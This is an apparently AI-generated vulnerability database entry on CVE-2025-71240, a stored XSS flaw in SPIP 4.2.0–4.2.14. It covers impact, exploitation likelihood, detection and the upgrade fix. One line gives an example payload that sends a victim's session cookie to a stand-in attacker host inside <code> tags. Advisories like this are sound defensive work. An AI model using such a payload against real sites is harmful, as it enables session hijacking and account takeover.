
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-71240 is a Cross-Site Scripting (XSS) vulnerability in SPIP, an open-source web publishing system, affecting versions 4.2.0 through 4.2.14 (fixed in 4.2.15). The flaw allows authenticated attackers to inject malicious JavaScript via crafted content within HTML <code> tags, which then executes in a victim's browser. It was published on February 19, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Tenable).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). SPIP fails to properly sanitize or validate JavaScript content embedded within HTML <code> tags during web page generation, allowing an attacker with low-privileged access to inject scripts that are later rendered and executed in other users' browsers. The attack vector is network-based, requires low privileges, and necessitates user interaction (a victim viewing the malicious content) (Feedly, InfinitSec).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and defacement of content visible to other users. The scope is changed (impacts extend beyond the vulnerable component), with low confidentiality and integrity impacts and no direct availability impact. The vulnerability does not provide direct server-side code execution or lateral movement capability, but stolen session cookies could enable account takeover (Feedly).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-71240 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Detection coverage exists via Tenable Nessus plugin 299640 (Tenable, Feedly).
<code> tag with embedded JavaScript, such as <code><script>document.location='https://attacker.com/steal?c='+document.cookie</script></code>, exploiting the lack of JavaScript validation within code tags.<code> tags with <script> or JavaScript event handlers (e.g., onerror, onload) in the body.Upgrade SPIP to version 4.2.15 or later, which includes the fix for improper JavaScript validation within <code> tags. No specific configuration-based workaround has been publicly documented; upgrading is the recommended and primary remediation. Organizations should also enforce a Content Security Policy (CSP) header to limit the impact of any XSS vulnerabilities, and restrict content submission to trusted users where possible (Feedly, Tenable).
Coverage of CVE-2025-71240 has been limited to vulnerability databases and security tooling, with no notable vendor statements, researcher commentary, or significant social media discussion identified. Tenable added detection support via Nessus plugin 299640, and InfinitSec published a brief technical post describing the vulnerability (InfinitSec, Tenable).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."